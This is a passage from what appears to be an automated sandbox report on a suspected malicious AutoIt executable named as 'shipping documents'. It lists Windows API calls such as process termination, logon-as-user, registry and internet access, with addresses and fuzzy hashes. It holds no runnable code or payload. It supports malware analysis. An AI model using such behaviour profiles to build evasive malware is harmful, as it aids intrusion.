                                                • ScreenToClient.USER32(?,?), ref: 0069181B
                                                • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0069182C
                                                • EndPaint.USER32(?,?), ref: 00691876
                                                Similarity
                                                • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                • String ID:
                                                • API String ID: 1827037458-0
                                                • Opcode ID: 2f6c22b8f90a69823ec4f08adf359c8cbd4ee46aa8e4de3ee24de52c663edec1
                                                • Instruction ID: 542bb7577ff3f5f3930bbc1599e09a9892dcf022b7b84b097cf229a81d71792e
                                                • Opcode Fuzzy Hash: 2f6c22b8f90a69823ec4f08adf359c8cbd4ee46aa8e4de3ee24de52c663edec1
                                                • Instruction Fuzzy Hash: CC41E270100302AFDB10DF68CC84FF63BF9EB4A724F248628F9948B2A1C775A845DB61
                                                APIs
                                                • ShowWindow.USER32(007567B0,00000000,01654CF0,?,?,007567B0,?,0071B862,?,?), ref: 0071B9CC
                                                • EnableWindow.USER32(00000000,00000000), ref: 0071B9F0
                                                • ShowWindow.USER32(007567B0,00000000,01654CF0,?,?,007567B0,?,0071B862,?,?), ref: 0071BA50
                                                • ShowWindow.USER32(00000000,00000004,?,0071B862,?,?), ref: 0071BA62
                                                • EnableWindow.USER32(00000000,00000001), ref: 0071BA86
                                                • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0071BAA9
                                                Similarity
                                                • API ID: Window$Show$Enable$MessageSend
                                                • String ID:
                                                • API String ID: 642888154-0
                                                • Opcode ID: 403933c3fb8a3753a623bbdef988f7c02a745896c90ee42e4789a499c621cd92
                                                • Instruction ID: e143173fe4a018d5a4e53587b4445f4add5fe03b8a849e85cc165700358e19f1
                                                • Opcode Fuzzy Hash: 403933c3fb8a3753a623bbdef988f7c02a745896c90ee42e4789a499c621cd92
                                                • Instruction Fuzzy Hash: 87412F34600641EFDB25CF2CC499BD57BE1BF05315F1881A9FA488F6E2C735A886CB51
                                                APIs
                                                • GetForegroundWindow.USER32(?,?,?,?,?,?,00705134,?,?,00000000,00000001), ref: 007073BF
                                                  • Part of subcall function 00703C94: GetWindowRect.USER32(?,?), ref: 00703CA7
                                                • GetDesktopWindow.USER32 ref: 007073E9
                                                • GetWindowRect.USER32(00000000), ref: 007073F0
                                                • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00707422
                                                  • Part of subcall function 006F54E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 006F555E
                                                • GetCursorPos.USER32(?), ref: 0070744E
                                                • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 007074AC
                                                Similarity
                                                • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                • String ID:
                                                • API String ID: 4137160315-0
                                                • Opcode ID: c918fa58f99a9ad569f9c07dbb04521374e4718ad3fa008276be0908fb6e3d4c
                                                • Instruction ID: fb675996f303876c015398e18d3e8e63ed4fad9f8857f0f0bf90534c8749c401
                                                • Opcode Fuzzy Hash: c918fa58f99a9ad569f9c07dbb04521374e4718ad3fa008276be0908fb6e3d4c
                                                • Instruction Fuzzy Hash: 7631F232508345ABD724DF18C849E9BBBEAFF88304F004A19F589971D1C634E908CB96
                                                APIs
                                                  • Part of subcall function 006E85F1: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 006E8608
                                                  • Part of subcall function 006E85F1: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 006E8612
                                                  • Part of subcall function 006E85F1: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 006E8621
                                                  • Part of subcall function 006E85F1: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 006E8628
                                                  • Part of subcall function 006E85F1: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 006E863E
                                                • GetLengthSid.ADVAPI32(?,00000000,006E8977), ref: 006E8DAC
                                                • GetProcessHeap.KERNEL32(00000008,00000000), ref: 006E8DB8
                                                • HeapAlloc.KERNEL32(00000000), ref: 006E8DBF
                                                • CopySid.ADVAPI32(00000000,00000000,?), ref: 006E8DD8
                                                • GetProcessHeap.KERNEL32(00000000,00000000,006E8977), ref: 006E8DEC
                                                • HeapFree.KERNEL32(00000000), ref: 006E8DF3
                                                Similarity
                                                • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                • String ID:
                                                • API String ID: 3008561057-0
                                                • Opcode ID: 4dbfea9375f5d3cc6d4aa619b35bf923faebb3561e4f4e07358ecb3815e6ad61
                                                • Instruction ID: 288b3c7c77536342b449437f825c85c60c3ae99886464acfa43238853a2463ed
                                                • Opcode Fuzzy Hash: 4dbfea9375f5d3cc6d4aa619b35bf923faebb3561e4f4e07358ecb3815e6ad61
                                                • Instruction Fuzzy Hash: F411AC31902609FFDB109FA9CC09BEEBBAAEF55315F108169E84997290CB369D00DB64
                                                APIs
                                                • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 006E8B2A
                                                • OpenProcessToken.ADVAPI32(00000000), ref: 006E8B31
                                                • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 006E8B40
                                                • CloseHandle.KERNEL32(00000004), ref: 006E8B4B
                                                • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 006E8B7A
                                                • DestroyEnvironmentBlock.USERENV(00000000), ref: 006E8B8E
                                                Similarity
                                                • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                • String ID:
                                                • API String ID: 1413079979-0
                                                • Opcode ID: aa1271459a5f9192587c05b0a80659e5e40e8e7e6f5d2ad674ad3103406cef98
                                                • Instruction ID: 8153a66032b7b3b3bbdf309a7108ebb41654102a9dde8f451fd3f3840f72d064
                                                • Opcode Fuzzy Hash: aa1271459a5f9192587c05b0a80659e5e40e8e7e6f5d2ad674ad3103406cef98
                                                • Instruction Fuzzy Hash: FF112CB2501249AFDF01CFA9DD49FDE7BAAEF08314F048065FE08A61A0C7759D65DB60
                                                APIs
                                                  • Part of subcall function 006912F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0069134D
                                                  • Part of subcall function 006912F3: SelectObject.GDI32(?,00000000), ref: 0069135C
                                                  • Part of subcall function 006912F3: BeginPath.GDI32(?), ref: 00691373
                                                  • Part of subcall function 006912F3: SelectObject.GDI32(?,00000000), ref: 0069139C
                                                • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0071C1C4
                                                • LineTo.GDI32(00000000,00000003,?), ref: 0071C1D8
                                                • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0071C1E6
                                                • LineTo.GDI32(00000000,00000000,?), ref: 0071C1F6
                                                • EndPath.GDI32(00000000), ref: 0071C206
                                                • StrokePath.GDI32(00000000), ref: 0071C216
                                                Similarity
                                                • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                • String ID:
                                                • API String ID: 43455801-0
                                                • Opcode ID: 69d49aa9b7ee011a05fbe019e6294da95aa2ea7a01fff70be6e772d8d2e8bc7a
                                                • Instruction ID: a7f3ae0073f8d03526ecd83dafd8724d00147d0ff2bfa9958790225bb9d6cce1
                                                • Opcode Fuzzy Hash: 69d49aa9b7ee011a05fbe019e6294da95aa2ea7a01fff70be6e772d8d2e8bc7a
                                                • Instruction Fuzzy Hash: 1F11097640014DBFDF129F94DC88EEA7FADEB08354F14C021FA184A1A1C7759E95DBA4
                                                APIs
                                                • MapVirtualKeyW.USER32(0000005B,00000000), ref: 006B03D3
                                                • MapVirtualKeyW.USER32(00000010,00000000), ref: 006B03DB
                                                • MapVirtualKeyW.USER32(000000A0,00000000), ref: 006B03E6
                                                • MapVirtualKeyW.USER32(000000A1,00000000), ref: 006B03F1
                                                • MapVirtualKeyW.USER32(00000011,00000000), ref: 006B03F9
                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 006B0401
                                                Similarity
                                                • API ID: Virtual
                                                • String ID:
                                                • API String ID: 4278518827-0
                                                • Opcode ID: 3b0e8b14e3a1b2e06fbbc44636c631f29efde770f95560b55bf368e8f9a20cc0
                                                • Instruction ID: 75088a9c96e027d7591fd6da29afa6d99cfb27887eb8c3f74ddd1fa4b82ae84c
                                                • Opcode Fuzzy Hash: 3b0e8b14e3a1b2e06fbbc44636c631f29efde770f95560b55bf368e8f9a20cc0
                                                • Instruction Fuzzy Hash: 8E016CB0901B59BDE3008F5A8C85B52FFA8FF19354F00411BE15C47941C7F5A864CBE5
                                                APIs
                                                • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 006F569B
                                                • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 006F56B1
                                                • GetWindowThreadProcessId.USER32(?,?), ref: 006F56C0
                                                • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 006F56CF
                                                • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 006F56D9
                                                • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 006F56E0
                                                Similarity
                                                • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                • String ID:
                                                • API String ID: 839392675-0
                                                • Opcode ID: 037e4ba104e8ffc4c66e2c369eb63d7f31e621cc0db78b096531ce5c39741ddc
                                                • Instruction ID: 8f55f73bf8604ddbad40edfabf85e1592b853d857f4b5e35190589117406ad50
                                                • Opcode Fuzzy Hash: 037e4ba104e8ffc4c66e2c369eb63d7f31e621cc0db78b096531ce5c39741ddc
                                                • Instruction Fuzzy Hash: BDF09032241518BBE3215BA6DC0DEEF7F7CEFC6B11F008169FA04D10A0D7A41A0186B9
                                                APIs
                                                • InterlockedExchange.KERNEL32(?,?), ref: 006F74E5
                                                • EnterCriticalSection.KERNEL32(?,?,006A1044,?,?), ref: 006F74F6
                                                • TerminateThread.KERNEL32(00000000,000001F6,?,006A1044,?,?), ref: 006F7503
                                                • WaitForSingleObject.KERNEL32(00000000,000003E8,?,006A1044,?,?), ref: 006F7510
                                                  • Part of subcall function 006F6ED7: CloseHandle.KERNEL32(00000000,?,006F751D,?,006A1044,?,?), ref: 006F6EE1
                                                • InterlockedExchange.KERNEL32(?,000001F6), ref: 006F7523
                                                • LeaveCriticalSection.KERNEL32(?,?,006A1044,?,?), ref: 006F752A
                                                Similarity
                                                • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                • String ID:
                                                • API String ID: 3495660284-0
                                                • Opcode ID: 29d86d9ad2a8373712d796c51c7e79762ab70c4eda716d43fb41c9375e0659d4
                                                • Instruction ID: af707ba1d571fc2dfe6887c5f07ef81ff3b8b8fb816f657fade26db6c34cd099
                                                • Opcode Fuzzy Hash: 29d86d9ad2a8373712d796c51c7e79762ab70c4eda716d43fb41c9375e0659d4
                                                • Instruction Fuzzy Hash: BAF05E7A544612EBDB511B68FC8D9EF772BFF45312B008631F602910F0CBB95811CB54
                                                APIs
                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 006E8E7F
                                                • UnloadUserProfile.USERENV(?,?), ref: 006E8E8B
                                                • CloseHandle.KERNEL32(?), ref: 006E8E94
                                                • CloseHandle.KERNEL32(?), ref: 006E8E9C
                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 006E8EA5
                                                • HeapFree.KERNEL32(00000000), ref: 006E8EAC
                                                Similarity
                                                • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                • String ID:
                                                • API String ID: 146765662-0
                                                APIs
                                                • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00722C7C,?), ref: 006E7C32
                                                • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00722C7C,?), ref: 006E7C4A
                                                • CLSIDFromProgID.OLE32(?,?,00000000,0071FB80,000000FF,?,00000000,00000800,00000000,?,00722C7C,?), ref: 006E7C6F
                                                • _memcmp.LIBCMT ref: 006E7C90
                                                Strings
                                                Similarity
                                                • API ID: FromProg$FreeTask_memcmp
                                                • String ID: ,,r
                                                • API String ID: 314563124-1227627816
                                                APIs
                                                • VariantInit.OLEAUT32(?), ref: 00708928
                                                • CharUpperBuffW.USER32(?,?), ref: 00708A37
                                                • VariantClear.OLEAUT32(?), ref: 00708BAF
                                                  • Part of subcall function 006F7804: VariantInit.OLEAUT32(00000000), ref: 006F7844
                                                  • Part of subcall function 006F7804: VariantCopy.OLEAUT32(00000000,?), ref: 006F784D
                                                  • Part of subcall function 006F7804: VariantClear.OLEAUT32(00000000), ref: 006F7859
                                                Strings
                                                Similarity
                                                • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                • API String ID: 4237274167-1221869570
                                                APIs
                                                  • Part of subcall function 006AFEC6: _wcscpy.LIBCMT ref: 006AFEE9
                                                • _memset.LIBCMT ref: 006F3077
                                                • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 006F30A6
                                                • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 006F3159
                                                • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 006F3187
                                                Strings
                                                Similarity
                                                • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                • String ID: 0
                                                • API String ID: 4152858687-4108050209
                                                APIs
                                                • _memset.LIBCMT ref: 006F2CAF
                                                • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 006F2CCB
                                                • DeleteMenu.USER32(?,00000007,00000000), ref: 006F2D11
                                                • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00756890,00000000), ref: 006F2D5A
                                                Strings
                                                Similarity
                                                • API ID: Menu$Delete$InfoItem_memset
                                                • String ID: 0
                                                • API String ID: 1173514356-4108050209
                                                APIs
                                                • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0070DAD9
                                                  • Part of subcall function 006979AB: _memmove.LIBCMT ref: 006979F9
                                                Strings
                                                Similarity
                                                • API ID: BuffCharLower_memmove
                                                • String ID: cdecl$none$stdcall$winapi
                                                • API String ID: 3425801089-567219261
                                                APIs
                                                  • Part of subcall function 00697F41: _memmove.LIBCMT ref: 00697F82
                                                  • Part of subcall function 006EB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 006EB0E7
                                                • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 006E93F6
                                                • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 006E9409
                                                • SendMessageW.USER32(?,00000189,?,00000000), ref: 006E9439
                                                  • Part of subcall function 00697D2C: _memmove.LIBCMT ref: 00697D66
                                                Strings
                                                Similarity
                                                • API ID: MessageSend$_memmove$ClassName
                                                • String ID: ComboBox$ListBox
                                                • API String ID: 365058703-1403004172
                                                APIs
                                                • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 006CD5EC
                                                  • Part of subcall function 00697D2C: _memmove.LIBCMT ref: 00697D66
                                                • _memset.LIBCMT ref: 0069418D
                                                • _wcscpy.LIBCMT ref: 006941E1
                                                • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 006941F1
                                                Strings
                                                Similarity
                                                • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                • String ID: Line:
                                                • API String ID: 3942752672-1585850449
                                                APIs
                                                • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00701B40
                                                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00701B66
                                                • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00701B96
                                                • InternetCloseHandle.WININET(00000000), ref: 00701BDD
                                                  • Part of subcall function 00702777: GetLastError.KERNEL32(?,?,00701B0B,00000000,00000000,00000001), ref: 0070278C
                                                  • Part of subcall function 00702777: SetEvent.KERNEL32(?,?,00701B0B,00000000,00000000,00000001), ref: 007027A1
                                                Strings
                                                Similarity
                                                • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                • String ID:
                                                • API String ID: 3113390036-3916222277
                                                APIs
                                                  • Part of subcall function 00691D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00691D73
                                                  • Part of subcall function 00691D35: GetStockObject.GDI32(00000011), ref: 00691D87
                                                  • Part of subcall function 00691D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00691D91
                                                • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 007166D0
                                                • LoadLibraryW.KERNEL32(?), ref: 007166D7
                                                • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 007166EC
                                                • DestroyWindow.USER32(?), ref: 007166F4
                                                Strings
                                                Similarity
                                                • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                • String ID: SysAnimate32
                                                • API String ID: 4146253029-1011021900
                                                APIs
                                                • GetStdHandle.KERNEL32(0000000C), ref: 006F705E
                                                • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 006F7091
                                                • GetStdHandle.KERNEL32(0000000C), ref: 006F70A3
                                                • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 006F70DD
                                                Strings
                                                Similarity
                                                • API ID: CreateHandle$FilePipe
                                                • String ID: nul
                                                • API String ID: 4209266947-2873401336
                                                APIs
                                                • GetStdHandle.KERNEL32(000000F6), ref: 006F712B
                                                • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 006F715D
                                                • GetStdHandle.KERNEL32(000000F6), ref: 006F716E
                                                • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 006F71A8
                                                Strings
                                                Similarity
                                                • API ID: CreateHandle$FilePipe
                                                • String ID: nul
                                                • API String ID: 4209266947-2873401336
                                                APIs
                                                • SetErrorMode.KERNEL32(00000001), ref: 006FAEBF
                                                • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 006FAF13
                                                • __swprintf.LIBCMT ref: 006FAF2C
                                                • SetErrorMode.KERNEL32(00000000,00000001,00000000,0071F910), ref: 006FAF6A
                                                Strings
                                                Similarity
                                                • API ID: ErrorMode$InformationVolume__swprintf
                                                • String ID: %lu
                                                • API String ID: 3164766367-685833217
                                                • Opcode ID: 84a9ab760c912dab61d3f24aefb0f1d836a431b562ea5af22ff619fccb38547d
                                                • Instruction ID: 933a098d3c016d5c87c72af6e3060650c342ecd7f7d8ec824e730fbb058c1813
                                                • Opcode Fuzzy Hash: 84a9ab760c912dab61d3f24aefb0f1d836a431b562ea5af22ff619fccb38547d
                                                • Instruction Fuzzy Hash: A4216074A0020DAFCB50EF68C985DEE7BB9EF49704B00806DF909EB251DB35EA41DB25
                                                APIs
                                                  • Part of subcall function 00697D2C: _memmove.LIBCMT ref: 00697D66
                                                  • Part of subcall function 006EA37C: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 006EA399
                                                  • Part of subcall function 006EA37C: GetWindowThreadProcessId.USER32(?,00000000), ref: 006EA3AC
                                                  • Part of subcall function 006EA37C: GetCurrentThreadId.KERNEL32 ref: 006EA3B3
                                                  • Part of subcall function 006EA37C: AttachThreadInput.USER32(00000000), ref: 006EA3BA
                                                • GetFocus.USER32 ref: 006EA554
                                                  • Part of subcall function 006EA3C5: GetParent.USER32(?), ref: 006EA3D3
                                                • GetClassNameW.USER32(?,?,00000100), ref: 006EA59D
                                                • EnumChildWindows.USER32(?,006EA615), ref: 006EA5C5
                                                • __swprintf.LIBCMT ref: 006EA5DF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                 • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                                • String ID: %s%d
                                                • API String ID: 1941087503-1110647743
                                                • Opcode ID: a8d9f72ac9e2a126eb7f5e6f8dd4dcaed590a00f6ed4c55251fba9e05dc05adc
                                                • Instruction ID: a703a30783cd18c802abd5eee23c7029ab33318c88a6181c9377acb13df555f5
                                                • Opcode Fuzzy Hash: a8d9f72ac9e2a126eb7f5e6f8dd4dcaed590a00f6ed4c55251fba9e05dc05adc
                                                • Instruction Fuzzy Hash: DA11E471201308BBCF10BFA5DC85FEA377E9F49300F008079F908AA192DA7469468B39
                                                APIs
                                                • CharUpperBuffW.USER32(?,?), ref: 006F2048
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                 • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: BuffCharUpper
                                                • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                • API String ID: 3964851224-769500911
                                                • Opcode ID: 27eb6d58f0088e7d52437cdc87e8a85aaf57f008c48eb6af53b43c8949fe5935
                                                • Instruction ID: a37df1646538a6bc524a9e8f5ac4fd63b6ed969d2255165a499dfa91a582b078
                                                • Opcode Fuzzy Hash: 27eb6d58f0088e7d52437cdc87e8a85aaf57f008c48eb6af53b43c8949fe5935
                                                • Instruction Fuzzy Hash: BC115B7195010E9FDF40EFA4D8518FEB7B6FF15304B1084A8E855A7396EB326916CF50
                                                APIs
                                                • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0070EF1B
                                                • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0070EF4B
                                                • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0070F07E
                                                • CloseHandle.KERNEL32(?), ref: 0070F0FF
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                 • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                • String ID:
                                                • API String ID: 2364364464-0
                                                • Opcode ID: e9ff47dfef55d83a86f59b41814119d78a34a63802b856cca618a22c8fa76dc6
                                                • Instruction ID: b2f340630357edbf10d398ccfcf21f5b4ca4422991e5b6fc941ae6757a398fc6
                                                • Opcode Fuzzy Hash: e9ff47dfef55d83a86f59b41814119d78a34a63802b856cca618a22c8fa76dc6
                                                • Instruction Fuzzy Hash: 8481A1716003009FDB60DF28C886B2EB7EAEF48720F04891DF599DB6D2DB74AC018B55
                                                APIs
                                                  • Part of subcall function 00697F41: _memmove.LIBCMT ref: 00697F82
                                                  • Part of subcall function 007110A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00710038,?,?), ref: 007110BC
                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00710388
                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 007103C7
                                                • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0071040E
                                                • RegCloseKey.ADVAPI32(?,?), ref: 0071043A
                                                • RegCloseKey.ADVAPI32(00000000), ref: 00710447
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                 • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                • String ID:
                                                • API String ID: 3440857362-0
                                                • Opcode ID: 840e825b218a17cc804f458d02ab8ebbb0e83c17aae018159e0614a955b58632
                                                • Instruction ID: adb7db1828ea37a83c375b46e16fae39e57167db28776e4f4d0d6c38cbf264fd
                                                • Opcode Fuzzy Hash: 840e825b218a17cc804f458d02ab8ebbb0e83c17aae018159e0614a955b58632
                                                • Instruction Fuzzy Hash: F3515C31208244AFDB04EF58C881EAEB7E9FF88704F04892DF5958B2A1DB74E944CB56
                                                APIs
                                                • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 006FE88A
                                                • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 006FE8B3
                                                • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 006FE8F2
                                                  • Part of subcall function 00699997: __itow.LIBCMT ref: 006999C2
                                                  • Part of subcall function 00699997: __swprintf.LIBCMT ref: 00699A0C
                                                • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 006FE917
                                                • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 006FE91F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                 • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                • String ID:
                                                • API String ID: 1389676194-0
                                                • Opcode ID: a56071225b41caf9388b2a20c09d82df2ca8eb14cefb10d4a35d0ddbc78f1130
                                                • Instruction ID: 8ff9dfd6ca09fecff2e62761eb5dc1ddf56bd753e6f687d7bb6c9a8f462842d8
                                                • Opcode Fuzzy Hash: a56071225b41caf9388b2a20c09d82df2ca8eb14cefb10d4a35d0ddbc78f1130
                                                • Instruction Fuzzy Hash: 62511E35A00209DFCF41EF68C9819ADBBFAFF08310B148099E949AB761CB35ED51DB64
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                 • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 91528128c6e69d2f5e72f58d7d6b717991b0fc9739031c8051ab791900d1973f
                                                • Instruction ID: dd31fec0ff1b0c7b0379cd3d5f4fd7bba33310408439e1af90a88152cbd87f80
                                                • Opcode Fuzzy Hash: 91528128c6e69d2f5e72f58d7d6b717991b0fc9739031c8051ab791900d1973f
                                                • Instruction Fuzzy Hash: F041F535902204BFC710DF6CCC48FE9BBA5EB09310F558165FC65A72E1D778AD81DA51
                                                APIs
